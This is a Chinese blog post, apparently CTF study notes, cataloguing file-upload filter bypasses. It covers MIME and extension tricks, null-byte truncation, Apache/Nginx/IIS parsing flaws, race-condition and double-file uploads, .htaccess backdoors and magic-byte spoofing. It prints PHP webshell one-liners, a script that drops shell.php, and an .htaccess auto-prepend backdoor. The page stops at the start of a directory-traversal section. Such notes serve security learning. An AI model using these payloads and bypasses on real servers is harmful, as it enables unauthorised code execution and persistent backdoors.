<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"chensonghi.github.io.","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","Sidebar Display (only for Muse | Mist), available values":["always  expand for all pages automatically."],"display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="前端绕过正常上传文件,捉取数据包修改（bp抓包改后缀） 后端绕过服务器端检测的绕过 函数特性move_uploaded_file函数会自动去除文件名末尾的点 和 &#x2F;. fopen函数特性 123456789&lt;?php$filename&#x3D;&amp;#x27;1.php&#x2F;.&amp;#x27;;$content&#x3D;&quot;&lt;?php eval($_POST[1]);?&gt;&quot;;$f">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传">
<meta property="og:url" content="https://chensonghi.github.io./2023/10/10/file_upload/index.html">
<meta property="og:site_name" content="星河风">
<meta property="og:description" content="前端绕过正常上传文件,捉取数据包修改（bp抓包改后缀） 后端绕过服务器端检测的绕过 函数特性move_uploaded_file函数会自动去除文件名末尾的点 和 &#x2F;. fopen函数特性 123456789&lt;?php$filename&#x3D;&amp;#x27;1.php&#x2F;.&amp;#x27;;$content&#x3D;&quot;&lt;?php eval($_POST[1]);?&gt;&quot;;$f">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-10-10T10:38:57.000Z">
<meta property="article:modified_time" content="2024-02-04T16:58:18.034Z">
<meta property="article:author" content="chleynx">
<meta property="article:tag" content="2023 upload">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://chensonghi.github.io./2023/10/10/file_upload/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>文件上传 | 星河风</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">星河风</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://chensonghi.github.io./2023/10/10/file_upload/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/ch.jpg">
      <meta itemprop="name" content="chleynx">
      <meta itemprop="description" content="不是看到希望才坚持，而是坚持了才能看到希望">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="星河风">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          文件上传
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-10-10 18:38:57" itemprop="dateCreated datePublished" datetime="2023-10-10T18:38:57+08:00">2023-10-10</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-02-05 00:58:18" itemprop="dateModified" datetime="2024-02-05T00:58:18+08:00">2024-02-05</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Summar/" itemprop="url" rel="index"><span itemprop="name">Summar</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="前端绕过"><a href="#前端绕过" class="headerlink" title="前端绕过"></a>前端绕过</h1><p>正常上传文件,捉取数据包修改（bp抓包改后缀）</p>
<h1 id="后端绕过"><a href="#后端绕过" class="headerlink" title="后端绕过"></a>后端绕过</h1><p>服务器端检测的绕过</p>
<h2 id="函数特性"><a href="#函数特性" class="headerlink" title="函数特性"></a>函数特性</h2><p>move_uploaded_file函数会自动去除文件名末尾的点 和 &#x2F;.</p>
<p><code>fopen</code>函数特性</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$filename=&#x27;1.php/.&#x27;;</span><br><span class="line">$content=&quot;&lt;?php eval($_POST[1]);?&gt;&quot;;</span><br><span class="line">$f = fopen($filename, &#x27;w&#x27;);</span><br><span class="line">    fwrite($f, $content);</span><br><span class="line">    fclose($f);    </span><br><span class="line">?&gt; </span><br><span class="line">#会在当前目录生成1.php,文件名为1.php.也可以</span><br><span class="line">————————————————</span><br></pre></td></tr></table></figure>

<h5 id="其它"><a href="#其它" class="headerlink" title="其它"></a>其它</h5><p>后缀名大小写</p>
<p>后缀名双写</p>
<p><code>尝试php3 phtml php3457(linux+apache+php5.6)等后缀</code></p>
<p>检测MIME类型的,捉包改MIME类型</p>
<h3 id="服务端检测（MINE类型检测）"><a href="#服务端检测（MINE类型检测）" class="headerlink" title="服务端检测（MINE类型检测） #"></a>服务端检测（MINE类型检测） <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A3%80%E6%B5%8B-mine%E7%B1%BB%E5%9E%8B%E6%A3%80%E6%B5%8B">#</a></h3><blockquote>
<p>MIME (Multipurpose Internet Mail Extensions) 是描述消息内容类型的因特网标准。</p>
</blockquote>
<p>服务器代码判断$_FILES[”file“][“type”]是不是图片格式（<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>），如果不是，则不允许上传该文件。</p>
<p>绕过方法：</p>
<blockquote>
<p>抓包后更改Content-Type为允许的类型绕过该代码限制，比如将php文件的<code>Content-Type:application/octet-stream</code>修改为<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>等就可以</p>
</blockquote>
<p>常见MIMETYPE</p>
<blockquote>
<p>audio&#x2F;mpeg -&gt; .mp3 application&#x2F;msword -&gt; .doc application&#x2F;octet-stream -&gt; .exe application&#x2F;pdf -&gt; .pdf application&#x2F;x-javascript -&gt; .js application&#x2F;x-rar -&gt; .rar application&#x2F;zip -&gt; .zip image&#x2F;gif -&gt; .gif image&#x2F;jpeg -&gt; .jpg &#x2F; .jpeg image&#x2F;png -&gt; .png text&#x2F;plain -&gt; .txt text&#x2F;html -&gt; .html video&#x2F;mp4 -&gt; .mp4</p>
</blockquote>
<h3 id="服务端检测（目录路径检测）"><a href="#服务端检测（目录路径检测）" class="headerlink" title="服务端检测（目录路径检测） #"></a>服务端检测（目录路径检测） <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A3%80%E6%B5%8B-%E7%9B%AE%E5%BD%95%E8%B7%AF%E5%BE%84%E6%A3%80%E6%B5%8B">#</a></h3><p>对目录路径的检测不够严谨而导致可以使用%00截断绕过进行攻击。</p>
<p>绕过方法:</p>
<blockquote>
<ul>
<li>例如：&#x2F;111.php%00.gif&#x2F;111.gif -&gt; &#x2F;111.php</li>
</ul>
</blockquote>
<h3 id="服务端检测（文件扩展名检测）"><a href="#服务端检测（文件扩展名检测）" class="headerlink" title="服务端检测（文件扩展名检测） #"></a>服务端检测（文件扩展名检测） <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A3%80%E6%B5%8B-%E6%96%87%E4%BB%B6%E6%89%A9%E5%B1%95%E5%90%8D%E6%A3%80%E6%B5%8B">#</a></h3><p>绕过方法：</p>
<blockquote>
<ul>
<li>文件名大小写绕过，如：<code>*.pHp</code> <code>*.aSP</code></li>
<li>文件名双写绕过，如：<code>*.pphphp</code></li>
<li>Unicode： 当目标存在json_decode且检查在json_decode之前,可以将php写为<code>\u0070hp</code></li>
<li>名单列表绕过，如：<code>*.asa</code> <code>*.cer</code></li>
<li>特殊文件名绕过，比如windows文件名最后不能有.或空格，可设为<code>*.php.</code>或<code>*.php+</code></li>
<li>0x00截断绕过，比如：<code>*.php(0x00).jpg</code> 或 <code>*.php%00.jpg</code></li>
<li>文件包含漏洞</li>
<li>服务器解析漏洞</li>
<li>.htaccess文件攻击</li>
</ul>
</blockquote>
<h3 id="文件截断绕过攻击"><a href="#文件截断绕过攻击" class="headerlink" title="文件截断绕过攻击 #"></a>文件截断绕过攻击 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%96%87%E4%BB%B6%E6%88%AA%E6%96%AD%E7%BB%95%E8%BF%87%E6%94%BB%E5%87%BB">#</a></h3><blockquote>
<p>截断类型：PHP%00截断</p>
<p>截断原理：由于00代表结束符，所以会把00后面的所有字符删除</p>
<p>截断条件：PHP版本小于5.3.4，PHP的magic_quotes_gpc为OFF状态</p>
</blockquote>
<p>绕过方法：</p>
<blockquote>
<ul>
<li>例如上传文件shell.php，上传文件路径为&#x2F;?upload&#x3D;shell.php</li>
<li>绕过：&#x2F;?upload&#x3D;shell.php%00.jpg -&gt; &#x2F;?upload&#x3D;shell.php</li>
</ul>
</blockquote>
<h3 id="解析漏洞攻击"><a href="#解析漏洞攻击" class="headerlink" title="解析漏洞攻击 #"></a>解析漏洞攻击 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BB">#</a></h3><p>主要有目录解析、文件解析，Apache解析漏洞、Nginx解析漏洞、IIS7.5解析漏洞。</p>
<h4 id="目录解析"><a href="#目录解析" class="headerlink" title="目录解析 #"></a>目录解析 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E7%9B%AE%E5%BD%95%E8%A7%A3%E6%9E%90">#</a></h4><blockquote>
<ul>
<li>形式：<code>www.xxx.com/xxx.asp/xxx.jpg</code></li>
<li>原理：服务器会默认把 <code>.asp</code> 和 <code>.asp</code>目录下的文件都解析成asp文件</li>
</ul>
</blockquote>
<h4 id="文件解析"><a href="#文件解析" class="headerlink" title="文件解析 #"></a>文件解析 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90">#</a></h4><blockquote>
<ul>
<li>形式：<code>www.xxx.com/xxx.asp;.jpg</code></li>
<li>原理：服务器默认不解析<code>;</code>后面的内容，因此<code>xxx.asp;jpg</code>被解析为<code>xxx.asp</code>文件了</li>
</ul>
</blockquote>
<h4 id="Apache解析漏洞"><a href="#Apache解析漏洞" class="headerlink" title="Apache解析漏洞 #"></a>Apache解析漏洞 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#apache%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E">#</a></h4><p>服务器代码中限制了某些后缀的文件不允许上传，但是有些Apache是允许解析其它后缀的，例如在httpd.conf中如果配置有如下代码，则能够解析php和phtml文件</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application/x-httpd-php .php .phtml</span><br></pre></td></tr></table></figure>

<p>1</p>
<p>常用后缀：<code>*.php</code> <code>*.php3</code> <code>*.php4</code> <code>*.php5</code> <code>*.phtml</code> <code>*.pht</code></p>
<p>在Apache的解析顺序中，是从右到左开始解析文件后缀的，如果最右侧的扩展名不可识别，就继续往左判断，直到遇到可以解析的文件后缀为止。因此，例如上传的文件名为1.php.xxxx，因为后缀xxxx不可解析，所以向左解析后缀php。</p>
<blockquote>
<ul>
<li>例如：<code>shell.php.qwe.asd</code> -&gt;<code>shell.php</code></li>
</ul>
</blockquote>
<h4 id="Nginx解析漏洞"><a href="#Nginx解析漏洞" class="headerlink" title="Nginx解析漏洞 #"></a>Nginx解析漏洞 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#nginx%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E">#</a></h4><blockquote>
<p>Nginx默认是以CGI的方式支持PHP解析的，普遍的做法是在Nginx配置文件中通过 正则匹配设置<strong>SCRIPT_FILENAME</strong>。当访问<code>www.xxx.com/phpinfo.jpg/1.php</code>这个 URL时，$fastcgi_script_name会被设置为“phpinfo.jpg&#x2F;1.php”，然后构造成 SCRIPT_FILENAME传递给PHP CGI。</p>
<p>原因是开启了 fix_pathinfo 这个选项，会触发 在PHP中的如下逻辑： PHP会认为SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO，所以就会 将phpinfo.jpg作为PHP文件来解析了。</p>
</blockquote>
<p>攻击方式</p>
<blockquote>
<ul>
<li>形式： <code>www.xxxx.com/UploadFiles/image/1.jpg/1.php</code> <code>www.xxxx.com/UploadFiles/image/1.jpg%00.php</code> <code>www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php</code></li>
<li>另一种方法：上传一个名字为test.jpg，然后访问<code>test.jpg/.php</code>,在这个目录下就会生成一句话木马shell.php。</li>
</ul>
</blockquote>
<h4 id="IIS7-5解析漏洞"><a href="#IIS7-5解析漏洞" class="headerlink" title="IIS7.5解析漏洞 #"></a>IIS7.5解析漏洞 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#iis7-5%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E">#</a></h4><blockquote>
<p>IIS7.5的漏洞与nginx的类似，都是由于php配置文件中，开启了 <strong>cgi.fix_pathinfo</strong>，而这并不是nginx或者iis7.5本身的漏洞。</p>
</blockquote>
<h3 id="竞争条件攻击"><a href="#竞争条件攻击" class="headerlink" title="竞争条件攻击 #"></a>竞争条件攻击 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E7%AB%9E%E4%BA%89%E6%9D%A1%E4%BB%B6%E6%94%BB%E5%87%BB">#</a></h3><p>一些网站上传文件的逻辑时先允许上传任意文件，然后检查上传文件的文件是否包含WebShell脚本，如果包含则删除该文件。这里存在的问题是文件上传成功后和删除文件之间存在一个短暂的时间差（因为需要执行检查文件和删除文件的操作），攻击者可以利用这个时间差完成竞争条件的上传漏洞攻击。</p>
<p>攻击方法：</p>
<blockquote>
<ul>
<li>攻击者需要先上传一个WebShell脚本1.php，1.php的内容为生成一个新的WebShell脚本shell.php，1.php写入如下代码</li>
</ul>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	fputs(fopen(&quot;../shell.php&quot;, &quot;w&quot;),&#x27;&lt;?php @eval($_POST[&#x27;cmd&#x27;]); ?&gt;&#x27;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>



<ul>
<li>当1.php上传完成后，客户端立即访问1.php，则会在服务端当前目录下自动生成shell.php，这时攻击者就利用了时间差完成了WebShell的上传</li>
</ul>
</blockquote>
<h3 id="双文件上传"><a href="#双文件上传" class="headerlink" title="双文件上传 #"></a>双文件上传 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E5%8F%8C%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0">#</a></h3><p>本意为上传两个或多个文件去突破。上传点支持多文件上传，但是却只对第一个文件做了过滤。</p>
<p>利用方式：</p>
<blockquote>
<ul>
<li>在存在双文件上传漏洞的页面中，查看上传的页面。F12找到上传的post表单，action属性是指定上传检测页面，一般是写的绝对路径，比如：<code>xxx.asp/xxx.php</code></li>
<li>补全url：<code>https://www.xxx.com/xxx.php(asp)</code></li>
<li>构造本地post提交表单</li>
</ul>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;https://www.xxx.com/xxx.asp(php)&quot; method=&quot;post&quot;</span><br><span class="line">name=&quot;form1&quot; enctype=&quot;multipart/form‐data&quot;&gt;</span><br><span class="line">&lt;input name=&quot;FileName1&quot; type=&quot;FILE&quot; class=&quot;tx1&quot; size=&quot;40&quot;&gt;</span><br><span class="line">&lt;input name=&quot;FileName2&quot; type=&quot;FILE&quot; class=&quot;tx1&quot; size=&quot;40&quot;&gt;</span><br><span class="line">&lt;input type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;上传&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<p>利用时只需要修改action的值为指定上传页面即可</p>
<ul>
<li>第一个文件上传允许的文件类型（<code>.jpg</code> <code>.png</code> <code>.gif</code> 等），第二个上传文件是一句话木马或者WebShell脚本。这样就可以突破上传限制，成功上传木马到服务器。</li>
</ul>
</blockquote>
<h3 id="php3457"><a href="#php3457" class="headerlink" title="php3457 #"></a>php3457 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#php3457">#</a></h3><blockquote>
<p>该项为apache专属。关键点在<code>/etc/apache2/mods-available/php5.6.conf</code>这个文件，满足<code>.+\.ph(p[3457]?|t|tml)$</code>，都会被当作php文件解析。</p>
<p>在apache2目录下<code>grep -r x-httpd-php /etc/apache2</code>找到对应文件就能知道解析哪些后缀。</p>
</blockquote>
<h3 id="htaccess文件攻击"><a href="#htaccess文件攻击" class="headerlink" title=".htaccess文件攻击 #"></a>.htaccess文件攻击 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#htaccess%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB">#</a></h3><blockquote>
<p>.htaccess文件(或者”分布式配置文件”）提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。</p>
<p>概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许&#x2F;阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。</p>
<p>启用.htaccess，需要修改httpd.conf，启用AllowOverride，并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名，可以用AccessFileName指令来改变。例如，需要使用.config ，则可以在服务器配置文件中按以下方法配置：AccessFileName .config 。</p>
<p>笼统地说，.htaccess可以帮我们实现包括：文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表，以及使用其他文件作为index文件等一些功能。</p>
</blockquote>
<p>一般<code>.htaccess</code>可以用来留后门和针对黑名单绕过。在上传网站的根目录下，上传一个<code>.htaccess</code>文件即可。</p>
<p>绕过方法：</p>
<blockquote>
<ul>
<li>针对黑名单绕过</li>
</ul>
<p>创建一个txt文件，写入</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType  application/x-httpd-php    .png</span><br></pre></td></tr></table></figure>



<p>另存为 <code>.htaccess</code> 名称，保存类型为所有文件，即可将<code>png</code>文件解析为<code>php</code>文件。</p>
<ul>
<li>留后门</li>
</ul>
<p>在<code>.htaccess</code> 内写入<code>php</code>解析规则，类似于把文件名包含<code>s</code>的解析成<code>php</code>文件</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;s&quot;&gt;</span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></figure>



<p><code>shell.png</code> 就会以<code>php</code>文件执行</p>
<ul>
<li>利用.htaccess进行文件包含</li>
</ul>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php_value auto_prepend_file &quot;.htaccess&quot;</span><br><span class="line">#&lt;?php eval($_POST[cmd]);?&gt;</span><br></pre></td></tr></table></figure>



<ul>
<li>使用#注释使得.htaccess能够成功解析</li>
</ul>
</blockquote>
<h3 id="服务器检测（文件内容检测）"><a href="#服务器检测（文件内容检测）" class="headerlink" title="服务器检测（文件内容检测） #"></a>服务器检测（文件内容检测） <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%A3%80%E6%B5%8B-%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E6%A3%80%E6%B5%8B">#</a></h3><h4 id="文件幻数检测（文件开头）"><a href="#文件幻数检测（文件开头）" class="headerlink" title="文件幻数检测（文件开头） #"></a>文件幻数检测（文件开头） <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%96%87%E4%BB%B6%E5%B9%BB%E6%95%B0%E6%A3%80%E6%B5%8B-%E6%96%87%E4%BB%B6%E5%BC%80%E5%A4%B4">#</a></h4><blockquote>
<p>幻数 magic number，它可以用来标记文件或者协议的格式，很多文件都有幻数标志来表明该文件的格式。</p>
</blockquote>
<p>要绕过文件幻数检测就要在文件开头写上如下的值</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">.jpg	FF D8 FF E0 00 10 4A 46 49 46</span><br><span class="line">.gif	47 49 46 38 39 61</span><br><span class="line">.png	89 50 4E 47</span><br></pre></td></tr></table></figure>



<p>在文件幻数后面加上自己的WebShell代码就行</p>
<h4 id="文件相关信息检测"><a href="#文件相关信息检测" class="headerlink" title="文件相关信息检测 #"></a>文件相关信息检测 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%96%87%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BF%A1%E6%81%AF%E6%A3%80%E6%B5%8B">#</a></h4><p>图像文件相关信息检测常用的是getimagesize()函数，需要把文件头部分伪造，也就是在幻数的基础上还加了一些文件信息。</p>
<blockquote>
<ul>
<li>例如下面结构</li>
</ul>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line">(...some binary data for image...)</span><br><span class="line">&lt;?php phpinfo(); ?&gt;</span><br><span class="line">(... skipping the rest of binary data ...)</span><br></pre></td></tr></table></figure>


</blockquote>
<p>另一种是判断是否包含<code>&lt;?</code>或者<code>php</code></p>
<blockquote>
<ul>
<li><p>绕过<code>&lt;?</code>：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=&#x27;php&#x27;&gt;@eval($_POST[cmd]);&lt;/script&gt;</span><br></pre></td></tr></table></figure>


</li>
<li><p>绕过<code>php</code>：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?= @eval($_POST[&#x27;cmd&#x27;]);?&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
</blockquote>
<p>绕过方法：</p>
<blockquote>
<ul>
<li>对渲染&#x2F;加载测试的攻击方式是代码注入绕过。使用winhex在不破坏文件本身的渲染情况下找一个空白区进行填充代码，一般为图片的注释区。</li>
<li>对二次渲染的攻击方式就是攻击文件加载器自身。例如：</li>
</ul>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">上传文件数据不完整的gif文件 -&gt; 触发报错imagecreatefromgif()函数</span><br><span class="line">上传文件数据不完整的png文件 -&gt; 触发报错imagecreatefrompng()函数</span><br></pre></td></tr></table></figure>



<p>某后台调用GD库对图像进行二次渲染的代码</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function image_gd_open($file, $extension)</span><br><span class="line">&#123;</span><br><span class="line">$extension = str_replace(&#x27;jpg&#x27;, &#x27;jpeg&#x27;, $extension);</span><br><span class="line">$open_func = &#x27;imageCreateFrom&#x27;. $extension; //函数名变成imageCreateFrompng 之类</span><br><span class="line">if (!function_exists($open_func))</span><br><span class="line">&#123;</span><br><span class="line">	return FALSE;</span><br><span class="line">&#125;</span><br><span class="line">return $open_func($file); //变成imagecreatefrompng(&#x27;/tmp/phpimage&#x27;)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>对文件加载器进行攻击，常见的就是溢出攻击。上传自己的恶意文件后，服务器上的文件加载器会主动进行加载测试，加载测试时被溢出攻击执行shellcode，比如access&#x2F;mdb溢出。</li>
</ul>
</blockquote>
<h3 id="文件上传中的目录穿越漏洞"><a href="#文件上传中的目录穿越漏洞" class="headerlink" title="文件上传中的目录穿越漏洞 #"></a>文件上传中的目录穿越漏洞 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E4%B8%AD%E7%9A%84%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A%E6%BC%8F%E6%B4%9E">#</a></h3><p>攻击方式</p>
<blockquote>
